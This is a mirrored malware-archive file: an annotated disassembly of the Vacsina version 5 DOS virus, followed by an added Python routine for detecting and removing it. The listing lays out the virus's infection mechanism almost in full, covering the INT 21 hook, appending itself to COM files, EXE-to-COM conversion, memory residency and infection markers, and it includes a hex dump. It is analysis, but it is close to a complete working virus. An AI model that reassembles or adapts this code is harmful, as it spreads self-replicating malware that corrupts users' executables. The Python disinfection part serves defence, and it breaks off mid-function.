mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2024-12-25 04:45:27 +00:00
897 lines
32 KiB
NASM

***************************
*   Vacsina, version 5    *
***************************

The virus is listed as it is laid out in memory, with offsets relative to its CS.

The length of the virus is 1206D-1221D bytes in a COM file, and 132D or
1338D-1353D bytes in an EXE file.

It plays no music and does no damage. (It only fails to restore the files' timestamps.)

It infects files when DOS function 4B is called.

It determines whether a file is infected from the file's last 8 bytes. See there
for a more detailed description. Disinfection can also be based on this.

It infects COM files that are longer than 1206D and shorter than 62867D bytes and
begin with a JMP, as well as EXE files shorter than 64947D bytes. It rounds COM
files up to a paragraph boundary, then copies the whole virus, together with its
memory control block, onto the end of the file in the form shown below. After an
infection it emits a beep. For the duration of the infection it opens a file named
VACSINA but does nothing with it. At run time it does not write back the original
3 bytes; instead it jumps directly to where the JMP at the start of the file pointed.
To an EXE file, if its header checks out, it appends 0084 bytes starting from 0039
(no rounding). This part does nothing except run the original EXE. Its purpose is
to turn the EXE into a COM so that the virus can infect it later. Interestingly, I
found almost the same code sequence in several original MS-DOS 3.10 files (DEBUG,
PRINT, ...). So the virus writer took this part (the relocation of EXEs) from
there. I assume there is an EXE2BIN program that converts even non-relocatable
EXEs to COM. This code fragment may come from there.

It determines whether Vacsina is already in memory from the identifier word 397F
placed at 0000:00C5. It puts the virus version number at 0000:00C7.


FFF0 MLB        DB 4D           ;The virus sits in a separate memory block.
FFF1 MLB_GAZDA  DW ?            ;Oddly, it "carries" this along with it too
FFF3 MLB_HOSSZ  DW ?            ;Length of the memory block in paragraphs
FFF5            DB 0B DUP ?

;---------------------------------------------------------------
;                          Variables
;---------------------------------------------------------------

0000 ERE_INT21  DD ?            ;Original address of INT 21
0004 ERE_INT24  DD ?            ;Original address of INT 24
0008 F_ATTR     DW ?            ;Original attribute of the file
000A HANDLE     DW ?            ;File handle
000C BUFFER     DB 8 DUP (?)    ;8-byte buffer

; A standard FCB

0014 FCB        DB 0            ;Current drive
0015            DB 'VACSINA    ' ;File name
0020            DW ?            ;Current block
0022            DW ?            ;Record length
0024            DD ?            ;File length
0028            DW ?            ;Date
002A            DW ?            ;Time
002C            DB 8 DUP (?)    ;Reserved
0034            DB ?            ;Record number within the block
0035            DD ?            ;Random record

;------------------------------------------------------------------
;To an EXE file it appends only the 0084 (132D) bytes starting here
;------------------------------------------------------------------

0039            DB '                    '  ;20 spaces

                ORG 0045        ;Overlap from 0045 to 004C

0045 KEZD_IP    DW ?            ;this will be the initial value of ip
0047 KEZD_CS    DW ?            ;this will be the initial value of cs
0049 KEZD_SP    DW ?            ;this will be the initial value of sp
004B KEZD_SS    DW ?            ;this will be the initial value of ss

;---------------------------------------------------------------
;       Entry point for a file that was originally an EXE
;---------------------------------------------------------------
;With this part it makes an EXE file COM-format so that it can be infected

004D E80000         CALL 0050
0050 5B           * POP BX                   ;bx=0050
0051 50             PUSH AX
0052 8CC0           MOV AX,ES
0054 051000         ADD AX,0010              ;ax points to the future start of the program
0057 8B0E0E01       MOV CX,[010E]            ;Stack displacement
005B 03C8           ADD CX,AX                ;What the initial value of ss will be
005D 894FFB         MOV [BX-05],CX           ;KEZD_SS (004B)
0060 8B0E1601       MOV CX,[0116]            ;Code segment displacement
0064 03C8           ADD CX,AX
0066 894FF7         MOV [BX-09],CX           ;KEZD_CS (0047)
0069 8B0E1001       MOV CX,[0110]            ;initial value of sp
006D 894FF9         MOV [BX-07],CX           ;KEZD_SP (0049)
0070 8B0E1401       MOV CX,[0114]            ;initial value of ip
0074 894FF5         MOV [BX-0B],CX           ;KEZD_IP (0045)
0077 8B3E1801       MOV DI,[0118]            ;First relocation entry
007B 8B160801       MOV DX,[0108]            ;Header length in paragraphs
007F B104           MOV CL,04
0081 D3E2           SHL DX,CL                ;Header length in bytes
0083 8B0E0601       MOV CX,[0106]            ;Number of relocation entries
0087 E317           JCXZ 00A0                ;Jump if there is nothing to relocate

; Relocation loop

0089 26           * ES:
008A C5B50001       LDS SI,[DI+0100]         ;Where to relocate
008E 83C704         ADD DI,+04               ;Next relocation entry
0091 8CDD           MOV BP,DS
0093 26             ES:
0094 032E0801       ADD BP,[0108]            ;Header length in paragraphs
0098 03E8           ADD BP,AX                ;ax=real start of the program (file)
009A 8EDD           MOV DS,BP                ;Relocate here
009C 0104           ADD [SI],AX              ;Relocation
009E E2E9           LOOP 0089

; Move the relocated program into place

00A0 0E           * PUSH CS
00A1 1F             POP DS                   ;ds=cs
00A2 BF0001         MOV DI,0100
00A5 8BF2           MOV SI,DX                ;dx=Header length in bytes
00A7 81C60001       ADD SI,0100
00AB 8BCB           MOV CX,BX                ;How many bytes to move? (This is a bit more)
00AD 2BCE           SUB CX,SI
00AF F3             REPZ
00B0 A4             MOVSB

; Run the original EXE program

00B1 58             POP AX                   ;original value of ax
00B2 FA             CLI
00B3 8E57FB         MOV SS,[BX-05]           ;KEZD_SS
00B6 8B67F9         MOV SP,[BX-07]           ;KEZD_SP
00B9 FB             STI
00BA FF6FF5         JMP FAR [BX-0B]          ;KEZD_IP, KEZD_CS

;---------------------------------------------------------------
;               INT 24 (DOS critical error handler)
;---------------------------------------------------------------

00BD B003         * MOV AL,03                ;Have DOS report an error
00BF CF             IRET

;---------------------------------------------------------------
;               INT 21 (DOS entry point)
;---------------------------------------------------------------
; Intervenes only on function 4B00 (EXECUTE)

00C0 9C           * PUSHF
00C1 3D004B         CMP AX,4B00
00C4 7406           JZ 00CC
00C6 9D             POPF
00C7 2E             CS:
00C8 FF2E0000       JMP FAR [0000]

; DOS subfunction 4B00

00CC 06           * PUSH ES                  ;bp+10
00CD 1E             PUSH DS                  ;bp+0E
00CE 55             PUSH BP                  ;bp+0C
00CF 57             PUSH DI                  ;bp+0A
00D0 56             PUSH SI                  ;bp+08
00D1 52             PUSH DX                  ;bp+06
00D2 51             PUSH CX                  ;bp+04
00D3 53             PUSH BX                  ;bp+02
00D4 50             PUSH AX                  ;bp+00
00D5 8BEC           MOV BP,SP

; Get and replace INT 24

00D7 B82435         MOV AX,3524              ;GET_INT_VECT (es:bx)
00DA CD21           INT 21
00DC 2E             CS:
00DD 8C060600       MOV [0006],ES            ;ERE_INT24+2
00E1 2E             CS:
00E2 891E0400       MOV [0004],BX            ;ERE_INT24
00E6 0E             PUSH CS
00E7 1F             POP DS
00E8 BABD00         MOV DX,00BD
00EB B82425         MOV AX,2524              ;SET_INT_VECT (ds:dx)
00EE CD21           INT 21

; Open the file named VACSINA (probably for tracking the virus)

00F0 0E             PUSH CS                  ;Note: unnecessary
00F1 1F             POP DS
00F2 BA1400         MOV DX,0014
00F5 B40F           MOV AH,0F                ;OPEN_FCB (ds:dx)
00F7 CD21           INT 21

; Get the file's original attribute, clear the R/O bit

00F9 B80043         MOV AX,4300              ;GET_FILE_ATTR (cx)
00FC 8E5E0E         MOV DS,[BP+0E]
00FF 8B5606         MOV DX,[BP+06]
0102 CD21           INT 21
0104 7303           JNB 0109
0106 E9DA01         JMP 02E3                 ;On error
0109 2E           * CS:
010A 890E0800       MOV [0008],CX            ;F_ATTR
010E B80143         MOV AX,4301              ;SET_FILE_ATTR (cx)
0111 80E1FE         AND CL,FE                ;Clear the R/O bit
0114 CD21           INT 21
0116 7303           JNB 011B
0118 E9C801         JMP 02E3                 ;On error

; Open the target file
; BUG !!! It does not query and does not restore the file's original time.

011B B8023D       * MOV AX,3D02              ;OPEN_HANDLE (ds:dx)
011E 8E5E0E         MOV DS,[BP+0E]
0121 8B5606         MOV DX,[BP+06]
0124 CD21           INT 21
0126 7303           JNB 012B
0128 E9A801         JMP 02D3                 ;On error
012B 2E           * CS:
012C A30A00         MOV [000A],AX            ;HANDLE
012F 8BD8           MOV BX,AX

; Read the first 6 bytes of the file into BUFFER

0131 0E             PUSH CS
0132 1F             POP DS
0133 BA0C00         MOV DX,000C              ;offset BUFFER
0136 B90600         MOV CX,0006              ;read 6 bytes
0139 B43F           MOV AH,3F                ;READ_HANDLE (bx,ds:dx,cx)
013B CD21           INT 21
013D 7219           JB 0158                  ;On error
013F 3D0600         CMP AX,0006
0142 7514           JNZ 0158

; Is the chosen file an EXE?

0144 2E             CS:
0145 813E0C004D5A   CMP WORD PTR [000C],5A4D ;Is it an EXE file
014B 7503           JNZ 0150
014D E9B501         JMP 0305

;---------------------------------------------------------------
;                          COM file
;---------------------------------------------------------------

0150 2E           * CS:
0151 803E0C00E9     CMP BYTE PTR [000C],E9   ;Infect only if it begins with a JMP
0156 7403           JZ 015B

; Helper jump on error

0158 E96F01       * JMP 02CA

; 1206D < file length < 62867D

015B B80242       * MOV AX,4202              ;Seek to end of file
015E B90000         MOV CX,0000
0161 8BD1           MOV DX,CX
0163 2E             CS:
0164 8B1E0A00       MOV BX,[000A]            ;HANDLE
0168 CD21           INT 21                   ;dx:ax=file length
016A 72EC           JB 0158                  ;On error
016C 83FA00         CMP DX,+00
016F 75E7           JNZ 0158
0171 3DB604         CMP AX,04B6
0174 76E2           JBE 0158
0176 3D93F5         CMP AX,F593
0179 73DD           JNB 0158

; Store the file's data

017B 2E             CS:
017C A39E04         MOV [049E],AX            ;ERE_HOSSZ
017F 2E             CS:
0180 A10D00         MOV AX,[000D]            ;2nd and 3rd bytes of the file
0183 050301         ADD AX,0103              ;+ 0103
0186 2E             CS:
0187 A3A004         MOV [04A0],AX            ;ERE_2_3

; Read the last 8 bytes of the file

018A B80242         MOV AX,4202              ;To position end of file - 8
018D B9FFFF         MOV CX,FFFF
0190 BAF8FF         MOV DX,FFF8
0193 2E             CS:
0194 8B1E0A00       MOV BX,[000A]            ;HANDLE
0198 CD21           INT 21
019A 72BC           JB 0158                  ;On error
019C 2E             CS:
019D 8B1E0A00       MOV BX,[000A]            ;HANDLE
01A1 0E             PUSH CS
01A2 1F             POP DS
01A3 BA0C00         MOV DX,000C              ;offset BUFFER
01A6 B90800         MOV CX,0008              ;read 8 bytes
01A9 B43F           MOV AH,3F                ;READ_HANDLE (bx,ds:dx,cx)
01AB CD21           INT 21
01AD 72A9           JB 0158                  ;On error
01AF 3D0800         CMP AX,0008
01B2 75A4           JNZ 0158                 ;On error

; Is the file already infected

01B4 2E             CS:
01B5 813E1000F47A   CMP WORD PTR [0010],7AF4 ;Identifier word
01BB 7577           JNZ 0234                 ;Not yet infected
01BD 2E             CS:
01BE 833E120005     CMP WORD PTR [0012],+05  ;Version number
01C3 90             NOP
01C4 7392           JNB 0158                 ;Do not infect

;---------------------------------------------------------------
;   An earlier Vacsina has already infected it (removes that one)
;---------------------------------------------------------------
; Original data of the infected file

01C6 2E             CS:
01C7 A10C00         MOV AX,[000C]            ;ERE_HOSSZ
01CA 2E             CS:
01CB A39E04         MOV [049E],AX            ;ERE_HOSSZ
01CE 2E             CS:
01CF A10E00         MOV AX,[000E]            ;ERE_2_3
01D2 2E             CS:
01D3 A3A004         MOV [04A0],AX            ;ERE_2_3
01D6 2D0301         SUB AX,0103
01D9 2E             CS:
01DA A30C00         MOV [000C],AX            ;Original 2nd and 3rd bytes of the file

; Write back the file's original 2nd and 3rd bytes

01DD B80042         MOV AX,4200              ;Seek to the 2nd byte of the file
01E0 B90000         MOV CX,0000
01E3 BA0100         MOV DX,0001
01E6 2E             CS:
01E7 8B1E0A00       MOV BX,[000A]            ;HANDLE
01EB CD21           INT 21
01ED 725F           JB 024E                  ;On error
01EF B440           MOV AH,40                ;WRITE_HANDLE (bx,ds:dx,cx)
01F1 0E             PUSH CS
01F2 1F             POP DS
01F3 BA0C00         MOV DX,000C              ;offset BUFFER
01F6 B90200         MOV CX,0002              ;write 2 bytes
01F9 CD21           INT 21
01FB 7251           JB 024E                  ;On error
01FD 3D0200         CMP AX,0002
0200 754C           JNZ 024E                 ;On error

; Update the directory entry

0202 2E             CS:
0203 8B1E0A00       MOV BX,[000A]            ;HANDLE
0207 B445           MOV AH,45                ;DUPLICATE_HANDLE (bx)
0209 CD21           INT 21
020B 7208           JB 0215                  ;On error
020D 8BD8           MOV BX,AX
020F B43E           MOV AH,3E                ;CLOSE_HANDLE (bx)
0211 CD21           INT 21
0213 7239           JB 024E                  ;On error

; Truncate the file to its original size

0215 B80042         MOV AX,4200              ;Seek to the original end of the file
0218 B90000         MOV CX,0000
021B 2E             CS:
021C 8B169E04       MOV DX,[049E]            ;ERE_HOSSZ
0220 2E             CS:
0221 8B1E0A00       MOV BX,[000A]            ;HANDLE
0225 CD21           INT 21
0227 7225           JB 024E                  ;On error
0229 B440           MOV AH,40                ;WRITE_HANDLE (bx,ds:dx,cx)
022B 0E             PUSH CS
022C 1F             POP DS
022D B90000         MOV CX,0000              ;Truncation
0230 CD21           INT 21
0232 721A           JB 024E                  ;On error

; Infect the COM file
; Round the file length up to a paragraph boundary

0234 B80042       * MOV AX,4200
0237 B90000         MOV CX,0000
023A 2E             CS:
023B 8B169E04       MOV DX,[049E]            ;ERE_HOSSZ
023F 83C20F         ADD DX,+0F
0242 83E2F0         AND DX,-10               ;Rounding
0245 2E             CS:
0246 8B1E0A00       MOV BX,[000A]            ;HANDLE
024A CD21           INT 21
024C 7303           JNB 0251

; Helper jump on error

024E EB7A         * JMP 02CA                 ;On error
0250 90             NOP

; The virus copies itself onto the file together with its memory control block

0251 2E             CS:
0252 8B1E0A00       MOV BX,[000A]            ;HANDLE
0256 8CCA           MOV DX,CS
0258 4A             DEC DX
0259 8EDA           MOV DS,DX                ;ds=cs-1 (points to the memory control block)
025B BA0000         MOV DX,0000
025E B9B604         MOV CX,04B6              ;Virus length (1206)
0261 B440           MOV AH,40                ;WRITE_HANDLE (bx,ds:dx,cx)
0263 CD21           INT 21
0265 72E7           JB 024E                  ;On error
0267 3DB604         CMP AX,04B6
026A 75E2           JNZ 024E                 ;On error

; Update the directory entry

026C 2E             CS:
026D 8B1E0A00       MOV BX,[000A]            ;HANDLE
0271 B445           MOV AH,45                ;DUPLICATE_HANDLE (bx)
0273 CD21           INT 21
0275 7208           JB 027F                  ;On error
0277 8BD8           MOV BX,AX
0279 B43E           MOV AH,3E                ;CLOSE_HANDLE (bx)
027B CD21           INT 21
027D 72CF           JB 024E                  ;On error

; Compute the file's future first 3 bytes

027F 2E             CS:
0280 C6060C00E9     MOV BYTE PTR [000C],E9   ;JMP opcode
0285 2E             CS:
0286 8B169E04       MOV DX,[049E]            ;ERE_HOSSZ
028A 83C20F         ADD DX,+0F
028D 83E2F0         AND DX,-10               ;Rounding
0290 83EA03         SUB DX,+03               ;-3 because of the JMP
0293 81C2AC03       ADD DX,03AC              ;Offset of the entry point relative to the end of the file
0297 2E             CS:
0298 89160D00       MOV [000D],DX            ;JMP operand

; Overwrite the file's first 3 bytes

029C B80042         MOV AX,4200              ;To the start of the file
029F B90000         MOV CX,0000
02A2 8BD1           MOV DX,CX
02A4 2E             CS:
02A5 8B1E0A00       MOV BX,[000A]            ;HANDLE
02A9 CD21           INT 21
02AB 72A1           JB 024E                  ;On error
02AD 2E             CS:
02AE 8B1E0A00       MOV BX,[000A]            ;HANDLE
02B2 0E             PUSH CS
02B3 1F             POP DS
02B4 BA0C00         MOV DX,000C              ;offset BUFFER
02B7 B90300         MOV CX,0003              ;write 3 bytes
02BA B440           MOV AH,40                ;WRITE_HANDLE (bx,ds:dx,cx)
02BC CD21           INT 21
02BE 728E           JB 024E                  ;On error
02C0 3D0300         CMP AX,0003
02C3 7589           JNZ 024E                 ;On error

; Emit a BELL (this version is probably still a test copy)

02C5 B8070E         MOV AX,0E07              ;WRITE_TELETYPE
02C8 CD10           INT 10

; Close the file

02CA B43E         * MOV AH,3E                ;CLOSE_HANDLE (bx)
02CC 2E             CS:
02CD 8B1E0A00       MOV BX,[000A]            ;HANDLE
02D1 CD21           INT 21

; Restore the file's original attribute

02D3 B80143       * MOV AX,4301              ;SET_FILE_ATTR (cx)
02D6 8E5E0E         MOV DS,[BP+0E]           ;Points to the file name
02D9 8B5606         MOV DX,[BP+06]
02DC 2E             CS:
02DD 8B0E0800       MOV CX,[0008]            ;F_ATTR
02E1 CD21           INT 21

; Close the file named VACSINA (it gets a new date, nothing else)

02E3 0E           * PUSH CS
02E4 1F             POP DS
02E5 BA1400         MOV DX,0014              ;FCB
02E8 B410           MOV AH,10                ;CLOSE_FCB
02EA CD21           INT 21

; Restore INT 24, call the original DOS function

02EC B82425         MOV AX,2524              ;SET_INT_VECT (ds:dx)
02EF 2E             CS:
02F0 C5160400       LDS DX,[0004]            ;ERE_INT24
02F4 CD21           INT 21
02F6 58             POP AX
02F7 5B             POP BX
02F8 59             POP CX
02F9 5A             POP DX
02FA 5E             POP SI
02FB 5F             POP DI
02FC 5D             POP BP
02FD 1F             POP DS
02FE 07             POP ES
02FF 9D             POPF
0300 2E             CS:
0301 FF2E0000       JMP FAR [0000]           ;ERE_INT21

;---------------------------------------------------------------
;               Convert the EXE file to COM
;---------------------------------------------------------------
; file length < 64947D

0305 B80242       * MOV AX,4202              ;Seek to end of file
0308 B90000         MOV CX,0000
030B 8BD1           MOV DX,CX
030D 2E             CS:
030E 8B1E0A00       MOV BX,[000A]            ;HANDLE
0312 CD21           INT 21
0314 72B4           JB 02CA                  ;On error
0316 83FA00         CMP DX,+00
0319 75AF           JNZ 02CA
031B 3DB3FD         CMP AX,FDB3              ;64947D
031E 73AA           JNB 02CA

; Does the EXE header check out?

0320 2E             CS:
0321 A39E04         MOV [049E],AX            ;ERE_HOSSZ
0324 2E             CS:
0325 A11000         MOV AX,[0010]            ;File length in pages
0328 48             DEC AX
0329 B109           MOV CL,09                ;* 512D
032B D3E0           SHL AX,CL
032D 2E             CS:
032E 03060E00       ADD AX,[000E]            ;+ the remainder
0332 2E             CS:
0333 3B069E04       CMP AX,[049E]            ;Does it match the length?
0337 7591           JNZ 02CA                 ;If not

; Appends a part of the virus to the EXE (so the EXE can later become a COM)

0339 2E             CS:
033A 8B1E0A00       MOV BX,[000A]            ;HANDLE
033E B440           MOV AH,40                ;WRITE_HANDLE (bx,ds:dx,cx)
0340 0E             PUSH CS
0341 1F             POP DS
0342 BA3900         MOV DX,0039              ;From here
0345 B98400         MOV CX,0084              ;write 132D bytes
0348 CD21           INT 21
034A 72C8           JB 0314                  ;On error
034C 3D8400         CMP AX,0084
034F 75E6           JNZ 0337                 ;On error

; Update the directory entry

0351 2E             CS:
0352 8B1E0A00       MOV BX,[000A]            ;HANDLE
0356 B445           MOV AH,45                ;DUPLICATE_HANDLE (bx)
0358 CD21           INT 21
035A 7208           JB 0364                  ;On error
035C 8BD8           MOV BX,AX
035E B43E           MOV AH,3E                ;CLOSE_HANDLE (bx)
0360 CD21           INT 21
0362 72B0           JB 0314                  ;On error

; To the start of the file

0364 B80042         MOV AX,4200
0367 B90000         MOV CX,0000
036A 8BD1           MOV DX,CX
036C 2E             CS:
036D 8B1E0A00       MOV BX,[000A]            ;HANDLE
0371 CD21           INT 21
0373 729F           JB 0314                  ;On error

; Compute the future first 3 bytes

0375 2E             CS:
0376 C6060C00E9     MOV BYTE PTR [000C],E9   ;JMP opcode
037B 2E             CS:
037C A19E04         MOV AX,[049E]            ;ERE_HOSSZ
037F 051100         ADD AX,0011              ;0039+0011+3=004D is the entry point
0382 2E             CS:
0383 A30D00         MOV [000D],AX            ;JMP operand

; Overwrite the first 3 bytes

0386 2E             CS:
0387 8B1E0A00       MOV BX,[000A]            ;HANDLE
038B B440           MOV AH,40                ;WRITE_HANDLE
038D 0E             PUSH CS
038E 1F             POP DS
038F BA0C00         MOV DX,000C              ;offset BUFFER
0392 B90300         MOV CX,0003              ;write 3 bytes
0395 CD21           INT 21                   ;The file becomes COM type
0397 E930FF         JMP 02CA                 ;End
                                             ;Note: if a JMP 0150 stood here, it could infect the EXE right away

;---------------------------------------------------------------
;               Variable (original value of ax)
;---------------------------------------------------------------

039A ERE_AX     DW ?

;---------------------------------------------------------------
;               Entry point for a COM program
;---------------------------------------------------------------

039C E80000       * CALL 039F
039F 5B           * POP BX                   ;bx=039F
03A0 2E             CS:
03A1 8947FB         MOV [BX-05],AX           ;ERE_AX (039A)

; Decide whether Vacsina is already in memory

03A4 B80000         MOV AX,0000
03A7 8EC0           MOV ES,AX
03A9 26             ES:
03AA A1C500         MOV AX,[00C5]            ;2nd and 3rd bytes of the INT 31 vector
03AD 3D7F39         CMP AX,397F              ;Is Vacsina already in memory?
03B0 7508           JNZ 03BA                 ;Jump if not yet.
03B2 26             ES:
03B3 A0C700         MOV AL,[00C7]            ;Version number of the virus in memory
03B6 3C05           CMP AL,05                ;Version number of this virus
03B8 7332           JNB 03EC                 ;Jump if it is newer or this version

; Is there enough free memory

03BA 8BD4         * MOV DX,SP
03BC 2BD3           SUB DX,BX
03BE 81EA6C0B       SUB DX,0B6C
03C2 7228           JB 03EC                  ;Jump if there is not enough free memory

;The virus will go into a separate memory block whose control block is located before the virus.
;It sets the length of this memory block here.

03C4 BAC504         MOV DX,04C5              ;Memory required by the virus + 0F
03C7 B104           MOV CL,04
03C9 D3EA           SHR DX,CL                ;DIV 10
03CB 2E             CS:
03CC 899754FC       MOV [BX+FC54],DX         ;MLB_HOSSZ (FFF3) Length of the memory control block

; The virus copies itself further back (by 004C paragraphs)

03D0 8CD9           MOV CX,DS
03D2 03D1           ADD DX,CX
03D4 8EC2           MOV ES,DX                ;Everything must be moved back to here
03D6 8BF3           MOV SI,BX
03D8 81C651FC       ADD SI,FC51              ;si=FFF0 (virus with its attached memory control block)
03DC 8BFE           MOV DI,SI                ;Copies to the same offset
03DE B9B604         MOV CX,04B6              ;Virus length
03E1 FC             CLD
03E2 F3             REPZ
03E3 A4             MOVSB

; Control passes to the "copy" of the virus

03E4 06             PUSH ES
03E5 E80300         CALL 03EB
03E8 EB13           JMP 03FD                 ;continues at es:03FD
03EA 90             NOP
03EB CB           * RETF

; Run the original program

03EC 8CC8         * MOV AX,CS
03EE 8ED8           MOV DS,AX                ;Set up the segment registers
03F0 8EC0           MOV ES,AX
03F2 8ED0           MOV SS,AX
03F4 2E             CS:
03F5 8B47FB         MOV AX,[BX-05]           ;ERE_AX (039A)
03F8 2E             CS:
03F9 FFA70101       JMP [BX+0101]            ;ERE_2_3 (04A0) Where did the original program start?

; Control arrives here in the already copied virus (from 03E8)
; The original program, its PSP and its memory control block are moved back as well

03FD BE0000       * MOV SI,0000              ;Note: unnecessary
0400 BF0000         MOV DI,0000
0403 8BCB           MOV CX,BX                ;bx=039F
0405 81C161FC       ADD CX,FC61              ;cx=0000 (length of original program+PSP+memory control block)
0409 8CC2           MOV DX,ES
040B 4A             DEC DX
040C 8EC2           MOV ES,DX                ;segment--, because the memory control block is copied too
040E 8CDA           MOV DX,DS
0410 4A             DEC DX
0411 8EDA           MOV DS,DX
0413 03F1           ADD SI,CX
0415 4E             DEC SI                   ;Needed because we copy backwards
0416 8BFE           MOV DI,SI
0418 FD             STD
0419 F3             REPZ
041A A4             MOVSB
041B FC             CLD

; Record the move in the memory control blocks

041C 2E             CS:
041D 8B9754FC       MOV DX,[BX+FC54]         ;MLB_HOSSZ=4C Length of the memory block reserved by the virus
0421 26             ES:
0422 29160300       SUB [0003],DX            ;Shrink the original program's memory block
0426 26             ES:
0427 8C0E0100       MOV [0001],CS            ;New owner

; Copy the virus back into the freed space

042B BF0000         MOV DI,0000
042E 8BF3           MOV SI,BX                ;bx=039F
0430 81C651FC       ADD SI,FC51              ;FFF0 Start of the virus (together with the memory control block)
0434 B9B604         MOV CX,04B6
0437 1E             PUSH DS
0438 07             POP ES                   ;Copy back
0439 0E             PUSH CS
043A 1F             POP DS                   ;es=ds ; ds=cs
043B F3             REPZ
043C A4             MOVSB

; Other tasks (because of the new PSP)

043D 26             ES:
043E 832E030001     SUB WORD PTR [0003],+01  ;The length of the memory control block must not be counted!
0443 53             PUSH BX
0444 8CCB           MOV BX,CS
0446 B450           MOV AH,50                ;SET_PSP (bx)
0448 CD21           INT 21
044A 5B             POP BX
044B 2E             CS:
044C 8C0E3600       MOV [0036],CS            ;Set the owner inside the PSP
0450 2E             CS:
0451 8B162C00       MOV DX,[002C]            ;Environment segment
0455 4A             DEC DX
0456 8EC2           MOV ES,DX                ;Memory control block of the environment
0458 26             ES:
0459 8C0E0100       MOV [0001],CS            ;New owner

; Get and replace INT 21

045D B82135         MOV AX,3521              ;GET_INT_VECT (es:bx)
0460 53             PUSH BX
0461 CD21           INT 21
0463 36             SS:
0464 8C060200       MOV [0002],ES            ;ERE_INT21+2
0468 36             SS:
0469 891E0000       MOV [0000],BX            ;ERE_INT21
046D 5B             POP BX
046E B82125         MOV AX,2521              ;SET_INT_VECT (ds:dx)
0471 8CD2           MOV DX,SS
0473 8EDA           MOV DS,DX
0475 BAC000         MOV DX,00C0              ;The INT 21 routine will start at 00C0
0478 CD21           INT 21

; "The virus is already in memory" marker

047A B80000         MOV AX,0000
047D 8EC0           MOV ES,AX
047F 26             ES:
0480 C706C5007F39   MOV WORD PTR [00C5],397F ;Identifier word
0486 26             ES:
0487 C606C70005     MOV BYTE PTR [00C7],05   ;Virus version number

; Set the DTA (incorrectly!)

048C 8CC8           MOV AX,CS
048E 8ED8           MOV DS,AX
0490 B41A           MOV AH,1A                ;SET_DTA_ADDRESS (ds:dx)
0492 BA5000         MOV DX,0050              ;BUG !!! should be 0080
0495 CD21           INT 21

; Jump to run the original program

0497 2E             CS:
0498 8B47FB         MOV AX,[BX-05]           ;ERE_AX (039A) Note: completely unnecessary
049B E94EFF         JMP 03EC

;---------------------------------------------------------------
;   The last 8 bytes of the file contain the important information
;---------------------------------------------------------------

049E ERE_HOSSZ  DW ?            ;Original length of the file
04A0 ERE_2_3    DW ?            ;Original 2nd and 3rd bytes of the file + 0103
04A2 AZONOSITO  DW 7AF4         ;Identifier word. The infection is recognized by this
04A4 VERZIOSZAM DB 5            ;Virus version number
04A5 ERE_1      DB 0            ;Not yet used (the first byte is always E9)

Hex dump of the beginning of the virus:

cs-1:0000  4D 07 00 4B 00 00 00 00-00 00 00 00 00 00 00 00  M..K............
cs-1:0010  72 0E AE 0F 56 05 20 0D-20 00 05 00 03 01 CD 21  r...V. . ......!
cs-1:0020  B4 00 CD 20 00 56 41 43-53 49 4E 41 20 20 20 20  ... .VACSINA    
cs-1:0030  00 00 80 00 00 00 00 00-7C 11 37 A8 00 40 C2 00  ........|.7..@..
cs-1:0040  46 0A 00 00 00 00 00 00-00 20 20 20 20 20 20 20  F........       
cs-1:0050  20 20 20 20 20 20 20 20-20 20 20 20 20 E8 00 00               ...

Notes:

- It does not query and does not restore the file's original time.
- It sets the DTA incorrectly. This teething problem remained in the later versions as well.
- Interestingly, here it uses only 5A4D as the EXE signature, while the later versions
  also use 4D5A.
- I do not know why, after converting an EXE to COM, it does not jump straight to the
  COM infection part.
- There are quite a few unnecessary instructions in the code, which remained even in the
  later versions.
- The whole operation of the virus suggests that this is only experimentation.
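
Added example, not part of the original listing: a Python implementation of the trailer-based detection and clean-up that the introduction and the 049E-04A5 table describe. It decodes the last 8 bytes, cross-checks them against constants visible in the listing (04B6, 03AC, 0103, the paragraph rounding and the length limits) and restores the original length and JMP operand. All function names are this example's own, and the sample file is constructed, with zero filler standing in for the appended block.

```python
import struct
from dataclasses import dataclass
from typing import List, Optional

MARKER = 0x7AF4       # AZONOSITO word at 04A2
VIRUS_LEN = 0x04B6    # bytes appended to a COM file (write at 025E)
ENTRY_DELTA = 0x03AC  # entry-point offset added at 0293
JMP_BIAS = 0x0103     # bias added to the saved JMP operand at 0183


@dataclass
class Trailer:
    orig_len: int    # ERE_HOSSZ: original file length
    saved_2_3: int   # ERE_2_3: original bytes 2-3 plus 0103
    version: int     # VERZIOSZAM
    first_byte: int  # ERE_1: unused in version 5

    @property
    def orig_jmp_operand(self) -> int:
        return (self.saved_2_3 - JMP_BIAS) & 0xFFFF


def parse_trailer(data: bytes) -> Optional[Trailer]:
    """Return the decoded trailer, or None if the marker word is absent."""
    if len(data) < 8:
        return None
    orig_len, saved, marker, version, first = struct.unpack("<HHHBB", data[-8:])
    if marker != MARKER:
        return None
    return Trailer(orig_len, saved, version, first)


def layout_problems(data: bytes, t: Trailer) -> List[str]:
    """Cross-check the trailer against the version 5 COM layout.

    An empty list means every field agrees. A marker hit with problems is
    more likely a coincidence, another version or a damaged file.
    """
    problems = []
    rounded = (t.orig_len + 0x0F) & 0xFFF0  # rounding at 023F-0242
    if t.version != 5:
        problems.append("version byte is %d, not 5" % t.version)
    if not 0x04B6 < t.orig_len < 0xF593:    # limits tested at 0171-0179
        problems.append("original length outside the infectable range")
    if len(data) != rounded + VIRUS_LEN:
        problems.append("file length is not rounded length + 04B6")
    if len(data) < 3 or data[0] != 0xE9:
        problems.append("file does not start with a near JMP (E9)")
    else:
        operand = struct.unpack_from("<H", data, 1)[0]
        if operand != (rounded - 3 + ENTRY_DELTA) & 0xFFFF:
            problems.append("JMP operand does not lead to entry point 039C")
    return problems


def disinfect(data: bytes) -> bytes:
    """Return the original COM image; refuse anything that fails the checks."""
    t = parse_trailer(data)
    if t is None:
        raise ValueError("no Vacsina trailer found")
    problems = layout_problems(data, t)
    if problems:
        raise ValueError("inconsistent layout: " + "; ".join(problems))
    restored = bytearray(data[:t.orig_len])  # drop padding and appended block
    struct.pack_into("<H", restored, 1, t.orig_jmp_operand)  # bytes 2-3
    return bytes(restored)


def build_sample():
    """Constructed test input: (file with a version 5 trailer, original file)."""
    original = b"\xE9\x10\x00" + b"\x90" * 1297  # 1300-byte COM, starts with JMP
    rounded = (len(original) + 0x0F) & 0xFFF0
    trailer = struct.pack("<HHHBB", len(original), 0x0010 + JMP_BIAS, MARKER, 5, 0)
    body = original + b"\x00" * (rounded - len(original))
    body += b"\x00" * (VIRUS_LEN - 8) + trailer  # zero filler, not virus code
    head = b"\xE9" + struct.pack("<H", rounded - 3 + ENTRY_DELTA)
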